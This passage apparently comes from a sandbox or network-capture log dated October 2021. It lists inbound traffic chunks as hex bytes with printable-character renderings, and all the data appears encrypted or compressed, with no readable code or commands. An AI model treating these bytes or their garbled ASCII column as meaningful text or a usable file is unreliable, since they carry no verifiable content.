                                                                      2021-10-13 16:06:31 UTC124INData Raw: 55 de ea 19 09 51 56 c1 2c 56 a7 b8 f3 71 b9 5b ad 48 a0 a2 2c 52 be 6a 2b 76 a4 11 d6 d0 08 3a 1d 87 e3 9d a5 0b 17 e6 82 b1 d7 79 53 38 b4 8b 69 f9 cd 1c 3b a5 9f 39 8f f0 2d 81 4f 80 cf ef c6 9c a1 ff 7c f6 2f c7 de b2 89 04 22 55 b0 2d 99 f7 fa 2c 9a 89 a2 f7 01 91 d5 34 d3 e4 da 96 91 fe 40 a3 f3 2e f7 3b c6 dd 67 b0 a1 e2 f4 54 71 37 74 45 d3 e6 e4 26 de 9f f6 f7 15 c5 49 fe 46 70 cc 0f 46 59 a5 32 90 2c cf e9 30 07 2c 56 ec 2a 32 39 8c ab 3e e6 e2 9e 9a 10 0a df 61 5b 5b de 4f 4a 35 90 5a f3 ad 26 8b 0b 20 78 13 cd 72 25 d3 1b 71 57 87 00 b0 54 1e 78 e6 a8 3b 8e a6 4b 1d 02 db 4b 8e cb 98 56 33 b5 15 ad a5 f4 bc 34 c0 b7 e3 7c d6 e9 57 04 ee a9 f4 6a 21 14 74 53 32 62 76 07 4b 43 32 8d c6 1c 0b bd 22 22 b8 e2 c9 e8 15 ae 0f ea bb 23 59 77 cc 9c a3
                                                                      Data Ascii: UQV,Vq[H,Rj+v:yS8i;9-O|/"U-,4@.;gTq7tE&IFpFY2,0,V*29>a[[OJ5Z& xr%qWTx;KKV34|Wj!tS2bvKC2""#Yw
                                                                      2021-10-13 16:06:31 UTC125INData Raw: 1c e6 f1 fd 8e 7f bd 74 19 9b 40 a6 8b 79 0e 01 9d d4 c1 2b 3d 7c c5 0a 9b e1 45 f2 cd 85 06 2d bc fe 6d 4a 3d a5 20 1a 6a c9 cd 18 d0 d5 40 34 38 4b 78 ff d4 6c c6 56 d1 8b 1d b0 d2 58 0e e6 b2 f6 8a 6c 3c 8f f9 53 5c d7 6d 68 4d 8e 88 7a cf 66 29 a1 72 19 0f cc 0f b0 4e 01 49 fd eb 6d dd 78 67 51 7e 92 08 43 e7 af 0f 59 61 bd a8 c5 3d b0 18 39 66 49 25 6d e0 c3 33 70 f1 e0 cf 86 46 38 be ce 43 0c d4 f7 36 ab 3a ea 39 8d f5 31 43 53 2b 2e c7 59 f9 19 fe d7 cc 3e 31 90 6b cb b1 12 c3 25 5b d2 cb fa aa 59 a6 2f 78 bc 65 e9 ff aa 6e cb e4 e4 b9 6b 74 cc 4b 1d 23 b0 ae 7a c6 90 e9 17 46 37 51 f8 ae 58 3e b6 c6 e6 41 94 7d 55 71 83 b6 35 03 03 b9 0e 2b 86 00 89 6e 45 e2 cf b9 4b 85 77 88 e7 a0 4d 28 a5 1d fb 79 6e de 63 0a 1f 7e a6 50 f0 42 4b bc b7 4c 62 32
                                                                      Data Ascii: t@y+=|E-mJ= j@48KxlVXl<S\mhMzf)rNImxgQ~CYa=9fI%m3pF8C6:91CS+.Y>1k%[Y/xenktK#zF7QX>A}Uq5+nEKwM(ync~PBKLb2
                                                                      2021-10-13 16:06:31 UTC127INData Raw: e9 19 da 84 c8 8f 84 88 f2 be 30 91 59 9c e5 d3 c1 0b 19 d8 39 ac c4 2e 32 6f 60 04 ec 0f 84 4a 5b 1e a2 bf 98 0c 97 4c 74 cc e1 c9 e6 08 9c 1b 78 eb ab 7e 68 ff be 2f de 4d b4 c3 b8 ec 4b 28 89 69 3a 21 25 93 5f d0 c5 c8 a4 ba 33 ce 78 96 c7 75 40 62 f2 65 b5 2a 5a b5 f8 16 ac b8 6a 9d 4c 0d 2e 54 58 a0 b6 08 5a e4 2f fb 4e 39 60 ee 26 87 b8 7d 13 c0 9d ba 0a 83 00 54 f5 58 d5 84 8f a7 a6 ff c5 c8 3c 24 db b1 b6 59 65 14 f0 b4 aa 7b ef 35 6e 76 3f 5d f5 84 d4 cb 22 53 ff 5c e9 25 7d a7 02 4c 78 13 f5 0b 99 66 d5 4b 02 55 35 8d cd 05 e1 bf ed f6 0c 42 63 01 78 12 78 a0 55 b1 54 79 ab fe 42 52 46 77 62 d7 1a b8 4a d7 ef 7e a3 01 d6 9d c5 90 dd e9 e3 40 88 f5 0a c5 aa 22 b5 b9 e9 d5 60 fc b0 80 d0 9f 4c 84 c8 cf e2 32 ab 85 bc 88 85 64 58 9a d7 99 ba ef cf
                                                                      Data Ascii: 0Y9.2o`J[Ltx~h/MK(i:!%_3xu@be*ZjL.TXZ/N9`&}TX<$Ye{5nv?]"S\%}LxfKU5BcxxUTyBRFwbJ~@"`L2dX
                                                                      2021-10-13 16:06:31 UTC128INData Raw: 62 8d 5f 5b ee 40 ea 61 1e 62 30 eb b9 91 13 08 1e dc 28 95 ec 7e 10 73 6d cb d2 b7 d7 8a 34 f9 58 be 43 0c 22 7b 61 5c 5c db 6d 38 7b 5e 3a 7e 9e 3c cd ad 9f 65 7f 3d 23 cf aa a8 71 21 70 f1 12 5d b2 ac ce 78 91 4c 32 40 eb 71 5a 59 8a 4f ce 51 71 f0 54 84 5e f5 dd 6b 06 9a 90 32 bf 8a 8b cb 6f fe 8b c5 e0 54 84 f7 e8 34 30 54 c1 28 7e ce bb 11 71 b9 5b b0 25 47 fb 00 5c 9c 5f 42 45 2a 11 d6 3a 13 12 30 8d e2 9b 9e 67 97 6a ce b1 d3 64 3b dc a4 a6 66 db af 08 1a 66 9f 3b 5f a2 08 a9 60 aa db e9 ec f8 f7 66 7c f6 21 a5 c8 29 ac 2d 2e 67 51 47 af e1 ff 26 9c ba 84 dd 2f 1d 62 4f 79 8b a4 0b 92 fc 3f 3c 9e b4 d6 3e 91 f9 78 d6 fc 6e f1 54 75 2b 77 6f 85 9b e5 20 f0 f7 f3 ee 15 c5 49 c9 c6 e8 e9 28 4c 6b 44 5e a6 da cb e2 37 37 29 79 ea a4 83 6e 60 d4 a7 e3
                                                                      Data Ascii: b_[@ab0(~sm4XC"{a\\m8{^:~<e=#q!p]xL2@qZYOQqT^k2oT40T(~q[%G\_BE*:0gjd;ff;_`f|!)-.gQG&/bOy?<>xnTu+wo I(LkD^77)yn`
                                                                      2021-10-13 16:06:31 UTC129INData Raw: 74 60 cd 08 a9 83 99 3f d4 f0 43 23 0c d6 91 e3 89 ca 4b 32 db 89 f5 19 cd 16 20 b5 bf 59 9a 33 74 97 a0 45 80 72 1e cd 9b eb 14 b4 a1 b4 15 85 64 5e a7 7d ca 21 ee c9 be 02 a9 c8 09 24 71 ae ac 95 9c a9 ff 59 3a ef 2f 20 b4 06 9e cb 70 f8 61 97 3f 00 14 9e a7 a7 ff 40 f1 52 ab c6 65 6e 4c 1d 60 5f 40 60 68 36 b0 af 1b 88 7f b9 72 ab 93 6f ac ab 48 93 53 1e fd ec 2d 1d ee ef 50 e5 e2 61 df d8 bf bc 9c 91 f5 4b 76 a4 92 3f 16 5c cc e2 1a d6 f9 30 c8 df d3 79 fb cd d6 76 7b da ad 9a 8a c3 56 27 ee 0a f4 8a 6a 36 5b 80 ca 5d c0 41 5b d5 ab a3 5b 6b 06 af eb 6d 10 07 77 0d b0 48 b1 0e ae 63 4a fd ea 78 58 e4 97 aa 48 c1 b0 11 6e 14 a0 a4 eb 3a 30 66 a6 4d 2b 5f d4 76 c3 37 6f 61 5f c7 ba 6c 3e 36 c4 5c 68 eb 6c 19 86 38 f0 17 8a a9 4f dc 78 a9 54 41 53 63 38
                                                                      Data Ascii: t`?C#K2 Y3tErd^}!$qY:/ pa?@RenL`_@`h6roHS-PaKv?\0yv{V'j6[]A[[kmwHcJxXHn:0fM+_v7oa_l>6\hl8OxTASc8
                                                                      2021-10-13 16:06:31 UTC130INData Raw: c5 f7 a0 04 47 b3 96 7d 70 3c dd a9 be 55 e8 5d 10 e9 14 db 8f 02 ee 51 03 5e 56 7a f6 1e c7 21 2d 5e 5e 2a 7a 26 9b 66 f3 59 64 2b ac 93 c4 29 d3 81 77 d5 0b cb 3b 87 45 32 da 82 fd b1 4b 70 19 f6 6d 40 66 7d a0 a9 83 b9 6a 92 f8 43 39 3b eb bb ce 8d e0 cf 66 c0 f6 6c 1c ed 83 00 1c bf c3 bf 84 40 9c 91 f2 a0 db 1e ed e2 cc 45 bc bb 9c 23 af 49 5a 8d f9 9e 3a 91 50 bb 22 3f e8 a3 24 eb 8b 1b a1 97 98 4b 79 90 ef 0f 5d 93 50 96 d3 58 cf 4b ba 3b 2a 90 ca bc d8 66 45 d1 c5 8b 6d 65 f4 69 aa 54 54 71 d5 48 9d b0 8f 64 af 25 b1 6f 83 a0 45 81 af 62 17 07 05 82 75 28 3d 7e cf fc e5 78 44 68 ec b4 8d 2e b1 59 4b 56 22 b5 5d 1e 42 e4 d6 30 fb fd 1a 4c 8b cc 06 62 c8 f6 e7 5b 77 ad 00 af 74 62 2c dc b9 d4 27 6a 16 d5 a7 af 55 d7 69 69 d8 83 88 73 e9 7e 1c 68 13
                                                                      Data Ascii: G}p<U]Q^Vz!-^^*z&fYd+)w;E2Kpm@f}jC9;fl@E#IZ:P"?$Ky]PXK;*fEmeiTTqHd%oEbu(=~xDh.YKV"]B0Lb[wtb,'jUiis~h
                                                                      2021-10-13 16:06:31 UTC131INData Raw: a0 2d 17 0f a9 c2 50 b4 09 e9 d3 5c bb d7 7b 4e 65 a9 a6 6b fd b6 48 bc db 02 3a 5f b9 0d 4f 4d a8 db 75 e3 bb 9b d9 5d 38 25 ba a3 93 3f 0a 21 41 51 0e a7 24 f9 26 9a 8f 09 8b 9b 1e 62 4d 73 2a da 92 93 66 1e 0e e0 08 d3 dc 9e df 67 9a 04 97 f5 54 6a 16 4a 6a aa 99 e3 0c 5c e3 14 76 14 c1 6d 06 ab 72 cc 9f 67 60 49 15 a6 02 ce e2 37 0b fb 5e e8 a4 9a 67 26 87 3c e2 e6 b6 67 ec 92 de 65 77 23 0d 4f 40 48 8b 7e de bb 04 bd d8 5b f9 12 ed 6b 2c a8 99 6f 72 ab 05 5f 56 18 58 65 c2 5c 8e b0 b1 3c dc d3 67 c9 53 b8 f5 96 ee b1 7e a5 f0 be 16 f9 38 e2 7c cd e7 27 2b ec a3 8f c3 a6 6a e9 57 24 64 2d 57 4a 43 36 15 98 b5 18 9b 06 d9 55 e0 c9 c2 7f a0 81 5d d9 82 70 5a ca 9e a7 f6 cb ca 43 91 c1 4d 08 5b 43 50 5f 26 b7 72 c6 fc d0 ea 9f 1e c0 7e 06 f4 55 d1 7f d7
                                                                      Data Ascii: -P\{NekH:_OMu]8%?!AQ$&bMs*fgTjJj\vmrg`I7^g&<gew#O@H~[k,or_VXe\<gS~8|'+jW$d-WJC6U]pZCM[CP_&r~U
                                                                      2021-10-13 16:06:31 UTC132INData Raw: e7 05 09 91 f1 6b a2 22 95 3f 8c 67 c9 de 3e f6 0b 1a 4a a1 6a 84 f6 c9 f6 fe 53 f7 af 00 a9 c4 c5 7f 57 9e f4 8e 4a e3 d5 87 ca c7 f2 44 67 f1 8b 50 71 e9 78 16 e9 63 14 27 fb 25 9d 4a 2b 2d a9 f0 12 44 7d 78 5c c4 41 25 4f c1 2a 23 6b 28 84 84 1b 10 b2 18 1f 4b 25 5b f4 fb eb 1a 6d fb 7c c0 29 34 87 a0 c4 58 48 3c fc 1e 86 a2 cf 12 b6 8d 6f 2d 52 2b 2a f8 59 6d 3c d3 c6 c2 0c 38 8f 02 f8 1b 41 58 24 5d fc 89 7c 33 58 a6 b1 42 9d ee ea f2 5e 48 d4 e8 db c4 7a 68 e4 7f 37 0e b4 84 12 92 8b 96 8e 43 28 58 42 72 75 31 90 43 ce 4c 0b 5b 75 88 9c bc 1d 0e 13 b7 08 01 f5 56 3d 6d 45 e0 fa 35 af 39 5b 87 c5 9f b9 08 3d 1d 61 5c 5c c5 6d 07 e7 7e a0 7a be 25 dc bd b7 55 55 10 27 e5 c6 fc 6e 5e e9 f4 0d 3e 08 72 e3 76 b7 c9 70 4d 53 53 7a a2 91 67 e3 73 51 f8 7e
                                                                      Data Ascii: k"?g>JjSWJDgPqxc'%J+-D}x\A%O*#k(K%[m|)4XH<o-R+*Ym<8AX$]|3XB^Hzh7C(XBru1CL[uV=mE59[=a\\m~z%UU'n^>rvpMSSzgsQ~
                                                                      2021-10-13 16:06:31 UTC134INData Raw: 27 06 34 da 37 8f b9 b8 11 bc 26 0a cf c5 e4 f3 31 8b 9a 5c c6 a5 78 67 d8 9e a1 c2 65 99 d8 90 c7 63 ae f1 da 51 5f b8 b2 43 d5 da f0 a4 ba 33 d2 78 a9 e3 54 d1 60 d2 7d be 02 77 a8 d9 38 ab d0 14 02 67 8b 54 d2 60 3a 97 05 49 c3 30 c2 f4 8a 4f fc 00 bb 8d 51 11 c0 bb a9 70 fd 99 4a fc 74 e7 bc 15 84 a1 77 9d 4e 07 04 43 93 a8 58 78 3c 47 93 87 6f e3 7f 0e ee 3e 5d d1 d9 ff 51 07 61 e2 52 db 1c 5d 02 2a ce 06 93 dc 26 9f 46 cc 60 6c 2b 36 a9 e0 10 d8 a3 68 d2 21 4d 65 4b 54 32 de b9 7d 9c 49 70 85 f9 c6 2c d9 5c 08 ad a3 99 4b d3 f0 d9 1c 09 e9 b5 c3 af e1 c9 4c 62 d2 e5 1d ed 98 2f 9d 92 c1 bf 18 4f 33 fe 4d 81 72 1a cd c3 ed 14 b4 21 b9 15 96 42 78 ac fe b4 b8 cf a0 aa 22 3b d6 21 09 e9 8b 87 ae 3c f7 f4 58 3a eb 2f 7f b2 06 9e 49 7d f8 71 b1 19 08 97
                                                                      Data Ascii: '47&1\xgecQ_C3xT`}w8gT`:I0OQpJtwNCXx<Go>]QaR]*&F`l+6h!MeKT2}Ip,\KLb/O3Mr!Bx";!<X:/I}q
                                                                      2021-10-13 16:06:31 UTC135INData Raw: b1 5a 87 de 9b 6b 25 3f 1d fd 53 f7 aa d2 26 1d 7a 80 38 9f 3c d2 27 92 65 6f 1b 05 a7 c1 d6 e8 00 60 e7 0d 3a 37 9a cb 5b b5 53 53 4a c7 0b c3 58 91 63 c3 10 70 f6 7e 70 05 41 ce 4d 22 c6 f9 a8 9a 87 a7 ff 70 96 b4 4e cc 79 86 e8 e1 36 9b 28 58 2f 54 a0 e5 cc 71 b9 5f 35 69 f0 cc 0b 72 fe 41 2b 65 b4 52 c4 3a 08 25 02 a7 cf 9f b4 0f c3 75 b1 28 d6 7b 55 66 c4 8a 69 fd 2a 47 17 b7 bd 1b 1a bc 2d 81 6d ce c9 ef c6 89 ad d7 50 f4 25 bc 89 35 f7 99 20 41 4a 0c c9 08 fb 26 06 80 a2 e7 24 3f 24 48 53 e5 fa 18 81 fc 3b 3c d1 06 de 11 9e d9 4d 3c a2 04 f4 54 71 14 25 46 a8 99 7f 03 f7 8f ab 57 53 c4 4d d6 8b df de 05 42 52 7f 1b ab d0 ce e4 1d ad 7f cd e9 a4 81 64 46 ab 3e e2 7a b9 cc 80 2d ff 2d 72 03 dc 6f 91 5a 11 5b ec a6 0a b0 0b 5b ff 38 4b 08 be a9 99 74
                                                                      Data Ascii: Zk%?S&z8<'eo`:7[SSJXcp~pAM"pNy6(X/Tq_5irA+eR:%u({Ufi*G-mP%5 AJ&$?$HS;<M<Tq%FWSMBRdF>z--roZ[[8Kt
                                                                      2021-10-13 16:06:31 UTC136INData Raw: c2 bf 1e ff 94 ad c5 a6 52 76 ec e2 ec 34 d9 ae 9c 38 99 4c 75 8f ff b2 92 6d b7 23 23 3b cc 29 4d ea 8b 81 1e 9f a4 7c 7f 1a 86 0e 5d b3 26 eb c6 58 d5 7d bf 14 28 96 e6 14 24 81 dd d0 c1 af e6 0f f5 69 30 eb 5c 4d e2 4e 16 da 8e 64 8f 5f c4 7a 83 be 77 84 80 60 11 2b ad 7e 92 b0 3c 7a eb 70 8e 79 44 f2 53 bc b1 19 b7 d5 20 57 22 95 1f 97 57 e4 cf 02 fe d2 18 4a a7 60 fa 85 50 f7 e3 7f fa c1 01 af ee dd 24 e3 8e d2 aa 06 17 d5 87 ea d8 c2 69 76 cc 83 88 73 e9 7e 1c 6c 13 8d 26 e1 09 90 25 2a 2b 83 e8 49 f0 6e 5e 78 89 b6 25 4f e1 3a 13 46 39 bd af c5 3d b0 18 39 66 ad 25 6d e0 c3 33 4f 95 7b ea ab d0 3b 8c d6 7a 48 a5 fd 1e 86 18 7f 2a a7 ab 50 d6 7a 06 28 d8 54 49 ba ad 45 eb 21 3e af 6b d3 99 3f 5b 00 70 ea 8f a4 5c 59 a6 2b 47 11 ea cc d2 b9 68 fc c5
                                                                      Data Ascii: Rv48Lum##;)M|]&X}($i0\MNd_zw`+~<zpyDS W"WJ`P$ivs~l&%*+In^x%O:F9=9f%m3O{;zH*Pz(TIE!>k?[p\Y+Gh
                                                                      2021-10-13 16:06:31 UTC137INData Raw: ef cb a8 32 73 cc 01 62 c2 5a 33 86 48 eb cf 25 0d 21 db e9 a4 85 64 a4 bd 3e e2 ff 8f c9 bf 09 df 63 59 85 a2 d6 41 48 15 7b 63 a8 22 9d 93 7e d4 00 eb 56 b7 a9 99 70 77 3e 3f 5d 56 01 7b cb 91 c7 8f b6 9f 9a 70 4a 66 c9 cd bd 49 85 c8 91 36 80 dd ac 10 9b a2 e3 7c d2 e1 c9 11 ee a3 96 e7 08 39 72 56 22 4a 8b fa d3 42 36 8b 9d 0a 0b bd 26 90 70 cd db c4 37 39 80 5d c6 85 8c 60 c8 9e be d0 65 99 d8 90 c7 63 aa f1 da 51 5f b8 b2 cc d5 da f0 a4 ba 33 d1 78 a9 6c 54 d1 60 d2 85 b9 02 77 ae d0 3d 84 d2 12 2e cf 73 b3 4a 61 3e b3 b1 55 c2 30 58 4b 82 73 c8 06 0f 91 50 11 e0 78 87 60 fd 82 7d d8 5e ca b8 3f 00 f5 68 e2 d7 02 24 d2 b2 b6 59 e2 19 f0 a7 8c 5d 50 5e 10 ef 1e b5 e6 9b ef 4c 2f 53 f3 7a f0 34 df 7a 99 4d 78 0e fd b0 9a 66 d3 fb 49 06 bd aa ed 97 ff
                                                                      Data Ascii: 2sbZ3H%!d>cYAH{c"~Vpw>?]V{pJfI6|9rV"JB6&p79]`ecQ_3xlT`w=.sJa>U0XKsPx`}^?h$Y]P^L/Sz4zMxfI
                                                                      2021-10-13 16:06:31 UTC139INData Raw: 78 ea ad 60 9c df 5d 5d 68 cf dc a8 87 38 ea a5 82 86 5e fc 72 9d 2b d8 52 43 69 ca dc ea 3c 12 a2 06 d2 9f 15 43 5b c4 f9 a9 80 13 ef a7 2b 67 2a da e1 c3 80 68 63 e9 fb cb 54 34 fd 66 1f 34 9e a9 16 b8 0f c2 95 3c b1 5d 62 8f 55 89 91 d9 eb fb 3f 50 44 57 bc 04 1c 2e 01 99 55 18 e8 7e 0c 47 68 e4 d0 b1 fb 22 24 1e c0 bf 47 28 84 1c fb 79 eb f1 66 36 3b 5e 19 7b 9e 3c f2 de ae 48 7d 20 0d c8 c2 d6 ee 0a f2 8b 94 3b 28 8d c3 cc b6 53 55 fa 64 58 4b 7f b1 dd e2 53 71 d6 14 f3 20 6c c0 43 2f 87 f8 ae b0 25 fa 74 71 96 af 4a 5f 55 84 e8 7d 39 30 47 e7 0e ef a5 c5 88 50 c9 46 af 4c c0 f6 00 50 ba 46 01 e3 ea 8c d7 3a 0c 1a a1 8e e2 9d 2e 2c c4 e1 e9 91 6b 7a 51 46 a1 fc 70 fd b0 7d 22 8d b6 39 5f bb 07 03 33 31 da ef c2 b6 34 fe 7d f6 bf 9f 8e a2 af 20 9c 40
                                                                      Data Ascii: x`]]h8^r+RCi<C[+g*hcT4f4<]bU?PDW.U~Gh"$G(yf6;^{<H} ;(SUdXKSq lC/%tqJ_U}90GPFLPF:.,kzQFp}"9_314} @
                                                                      2021-10-13 16:06:31 UTC140INData Raw: 5c cc 94 97 fc 12 f0 e3 d3 26 d9 46 b3 b6 c3 5d 11 cc 90 8a a0 c4 5f 10 cf 1e 46 f1 9b f7 79 2a 7c f1 7c dc 98 23 9d 01 4c 7c 2a 03 27 9b 66 49 44 41 39 8a ac 13 00 fe 83 57 f1 3a 4d 45 01 4f 1a f3 a0 55 b7 61 f6 fd 4a 41 52 44 7d d7 a8 83 b9 d0 f6 dd 51 1f 04 24 92 e3 8f c0 e4 57 42 88 ea 0d c5 aa 22 b5 b9 e9 39 60 fc b0 80 d0 a0 92 1f ed e2 76 31 99 a9 ba 18 67 65 58 8d df 89 a3 ef c9 a5 01 13 e5 0b 24 ed a1 03 fa 23 88 6d 5d 1a 0e 0e 5d b3 9c bb fe 49 f3 43 76 38 2a 96 c0 5e bd ff 44 c8 e9 86 c4 65 f2 43 b2 0f e0 61 f3 6c 16 52 8e 64 8f e5 9c 42 92 98 4d 4e ac 62 11 0d e4 e7 ec 29 20 52 c2 52 e5 7e 6e 74 b7 00 9d 08 95 d5 a8 57 22 95 a5 33 6f f6 e9 38 35 fe 1a 4a 81 20 63 fb c9 e9 f6 53 f7 af 00 a9 c4 c1 7f 57 9e f4 8e 4a f2 d4 87 ca c7 f2 44 64 f1 8b
                                                                      Data Ascii: \&F]_Fy*||#L|*'fIDA9W:MEOUaJARD}Q$WB"9`v1geX$#m]]ICv8*^DeCalRdBMNb) RR~ntW"3o85J cSWJDd
                                                                      2021-10-13 16:06:31 UTC141INData Raw: ba 46 01 e3 ea 8c d7 3a 0c 1a 19 8d e2 9d 2e 2c c4 e1 e9 91 d3 79 51 46 a1 53 75 fd b0 7d 31 8d b6 39 5f bb 07 03 33 31 da ef c2 b6 8c fd 7d f6 bf 9f 8e a2 af 20 24 43 4e 2c af ea e7 26 9c be a7 d8 00 1f 64 63 d5 9b 43 93 93 f8 1b 25 f0 2e f3 89 bb f2 75 9c fc 9b f7 54 75 14 8a 5b a8 99 fa 2a f2 b0 8f 77 12 ef cb a8 32 73 cc 01 62 4a 59 33 86 48 eb cf 25 0d 21 53 ea a4 85 64 fa b6 3e e2 ff 8a c9 bf 09 df 63 59 81 a2 d6 41 48 15 7b fb ab 22 9d 93 7e d4 03 eb 56 2f aa 99 70 77 89 35 5d 56 00 5a ce be c5 89 9a 33 62 97 d2 67 cd e9 94 da 84 c8 0b 89 88 e2 98 16 b2 31 e2 7c f2 d3 12 06 ee bc 82 c1 0d 16 70 50 0e e6 73 1d 4b 43 32 af b7 9a 0a bd bc 2f 78 f2 ef c2 1d a9 81 5d e6 b8 45 77 c8 81 ad f4 60 b6 da 96 eb cf 56 16 42 50 5b 9c 99 5d d4 da 6a 1b b2 0c e6
                                                                      Data Ascii: F:.,yQFSu}19_31} $CN,&dcC%.uTu[*w2sbJY3H%!Sd>cYAH{"~V/pw5]VZ3bg1|pPsKC2/x]Ew`VBP[]j
                                                                      2021-10-13 16:06:31 UTC143INData Raw: 37 4f e5 78 5b aa e1 b4 9e 08 97 df cd 28 bb 94 3f 12 62 cf cd 18 d6 65 3f 67 b3 6c 58 d0 cb f6 e3 5b ea 8d 00 af f1 1f 29 e3 9d f4 8c 40 94 ab 1e cb 5d d3 49 5a d5 ab a5 eb cc 55 27 cc 4d 38 25 e1 0d 90 c0 0b 2b 83 69 44 f0 7e 78 5e ce 31 5b d6 c0 b0 02 66 14 a0 a4 ed 8a 97 35 2d 6a 0b 76 f6 e1 c3 17 e2 db 7a ea b4 47 36 8c c6 5c 6e e1 7a 60 1f 39 ea 3b 87 85 4d da 52 b1 0f f5 40 45 1c fd de ea 21 1a 15 24 d2 99 20 cc 0d 70 fa a9 82 19 de d8 b2 66 b0 fb ec fd a4 48 d4 72 de e6 66 4e c4 49 1d 23 b6 a4 b3 98 09 e8 08 4f 00 71 60 8b 73 1b 16 a7 72 60 1a 79 75 41 9e bc 1d b4 24 94 1a 27 c8 4e 12 6f 45 c6 64 97 d1 a0 45 8a e9 92 41 08 3b 37 7d 07 e8 d5 4b 23 3d 4f a2 7a 9e a6 f7 90 a5 6e 5d 0c 27 e5 c0 f6 29 00 70 f5 12 31 00 a4 e1 76 b1 79 d7 1e d8 74 5a 5d
                                                                      Data Ascii: 7Ox[(?be?glX[)@]IZU'M8%+iD~x^1[f5-jvzG6\nz`9;MR@E!$ pfHrfNI#Oq`sr`yuA$'NoEdEA;7}K#=Ozn]')p1vytZ]
                                                                      2021-10-13 16:06:31 UTC144INData Raw: cf 00 45 72 56 24 40 fc a6 4a 43 29 84 95 b5 08 bd 20 20 d3 9e 50 e3 17 af a1 0f c4 a5 58 ed ed b3 b3 fa 6d e6 d8 90 c1 69 d4 ad 43 50 40 a6 ba 72 d6 da f6 14 19 60 59 5f 89 fb 75 82 62 f2 65 34 27 5a a5 de 30 d5 d0 14 04 6d 1b 09 4b 61 25 8b 0d 79 c0 30 c4 44 29 1c 77 27 9b 94 70 45 c2 9b 90 fa d8 b4 47 d3 7c 9e bc 15 82 ab df c0 d7 06 1b 53 9b 9b 5b 78 3a f7 34 d4 e4 c4 5f 14 cf 6b 5f f1 9b 75 74 2a 6f d7 5a a3 1c 5d 04 20 0e 5b 0a dd 38 b3 4b d1 61 6a 01 2a f2 54 00 fe 87 57 85 23 4d 45 84 61 1f cc 84 75 e7 49 70 83 f3 0a 71 40 5d 17 b1 ab 94 48 d3 f6 69 bf 5a 62 92 e3 8b c0 9e 4e 42 88 6f 38 c0 95 06 95 e8 c1 bf 1e 45 d3 a3 d4 80 6d 0e c5 cf ee 14 b2 91 1a 46 1e 65 58 89 df ec ba ef c9 20 07 16 da 2f 04 b3 89 81 84 9a fb 4e 59 3a f0 17 75 9e 04 9e d5
                                                                      Data Ascii: ErV$@JC) PXmiCP@r`Y_ube4'Z0mKa%y0D)w'pEG|S[x:4_k_ut*oZ] [8Kaj*TW#MEauIpq@]HiZbNBo8EmFeX /NY:u
                                                                      2021-10-13 16:06:31 UTC145INData Raw: 14 4f 3d e4 d0 b7 4b 85 77 95 e7 9f 3b 0a 3d 1d db 4d 54 d4 4b 38 3c 56 8d 78 9e 3a f8 3b c9 d1 7c 3d 21 c5 b9 d4 e8 20 ea d0 20 28 0e a9 9a 74 b7 53 75 35 64 75 5a 46 98 4f ce 51 71 f0 54 6c 5e f5 dd 6b 06 a5 82 aa 9a a7 1e c8 5d 84 8d 4a 9e 56 84 e8 c7 42 38 56 c1 31 75 8c e8 8a 70 bf 75 29 32 44 df 2d 56 9a 3b 29 65 94 8f f3 17 1a 1c 3d f4 e0 9d b4 29 96 d6 cf b1 c8 53 79 6b 83 8b 6f d7 32 1c a3 a4 9b 3f 7f c1 2f 81 4d 32 fe c2 d7 b0 a9 83 7f f6 25 9a 04 96 89 00 36 69 63 2e 8f 0f d1 a4 e2 3c 8e f5 06 3f 1f 4b 53 e5 40 b7 be ed 1d 03 8f 2c f3 13 be 77 42 ba dc 8a dd 79 77 34 64 6d 2e e7 7c 27 da 99 ad 09 16 c5 4d 4c 8e 5f de 23 62 33 59 33 86 f2 67 c7 37 2b 1e 5b c0 89 87 44 08 80 b8 9c 79 9d e1 96 2b a0 67 73 03 46 6a 6d 5a 37 7b 8c ab 22 9d 29 e3 dc
                                                                      Data Ascii: O=Kw;=MTK8<Vx:;|=! (tSu5duZFOQqTl^k]JVB8V1upu)2D-V;)e=)Syko2?/M2%6ic.<?KS@,wByw4dm.|'ML_#b3Y3g7+[Dy+gsFjmZ7{")
                                                                      2021-10-13 16:06:31 UTC146INData Raw: 6c 5f a3 8e 04 d6 b9 b1 c3 25 5d 62 8c a9 21 7e 86 a5 65 b0 ff ec 48 80 48 d4 f7 ee e3 59 6a e4 60 35 a1 c8 1d 15 b8 0d c8 98 40 28 5c f8 ae 58 20 b6 f9 64 63 1a 7d 75 de ba bc 1d 39 29 94 0a 01 ee 54 92 11 dc e7 d0 b3 f1 30 58 87 c1 25 66 25 2c 3b db e9 73 d4 4b 07 ad 58 a0 7a 86 14 ff bf b7 4e 57 bf 5b 7c c1 d6 ec 00 e1 f7 0d 3a b2 ac ce 67 91 73 c4 62 41 75 7a eb b7 67 e3 44 59 db 7c ea 26 46 5e 15 9b 84 f8 ac ba 35 86 ed 70 0c 8e 47 f5 72 a4 7a e5 1c 1d 76 72 08 54 a4 dd a0 5d bb 5f a9 66 5f a0 b4 53 ba 44 0b f6 96 15 d6 a0 2d 17 0c a9 c2 0e b6 09 e9 d3 7a 97 d7 7b 46 6e ac 89 69 fb 9a e0 44 3c 9a 3b 5b 9d b9 83 4d a8 41 ca eb 87 af df e9 f4 25 ba 83 05 af 00 21 59 66 01 8d 09 fd 0c 1e db 16 f4 02 1b 42 dc 51 e5 da 08 b6 d1 2a 05 d2 bb f1 13 9e ff df
                                                                      Data Ascii: l_%]b!~eHHYj`5@(\X dc}u9)T0X%f%,;sKXzNW[|:gsbAuzgDY|&F^5pGrzvrT]_f_SD-z{FniD<;[MA%!YfBQ*
                                                                      2021-10-13 16:06:31 UTC147INData Raw: cf e4 05 7e f1 e0 d3 33 4c 22 20 f9 7a 0a dd 06 47 41 d3 61 75 03 81 8e cd 07 d4 01 09 4a 20 4d 41 3e f2 30 de a2 cf 94 66 61 a5 f3 f6 50 40 5d 28 76 a4 b9 4a ca d8 6e 3b 24 fd b9 65 f1 79 c8 4c 46 a8 42 1f ed 87 ba 90 92 d1 99 3e d2 b3 80 d4 a0 90 39 ed e2 f3 1d 9c 96 9e 38 81 4e da f3 66 b5 b8 eb e9 02 20 3b c8 93 01 c6 9a a7 a4 02 8b 6d 59 1a 04 28 5d b3 18 b6 fe 5a d5 65 bd bf 54 0f e1 3e a2 df fd d3 c1 ab 5c 40 d9 7b 16 51 c0 62 f3 68 16 43 a8 64 8f 60 b5 47 ae bc 6d aa 87 e4 6f b4 86 fc e8 09 87 78 ef 50 7f 5d 69 e0 ef b9 26 0a 91 f5 6b a9 05 95 3f 09 4b cc e2 1a d6 f9 30 cc df d3 79 fb cd d6 58 79 da ad 9a 8a 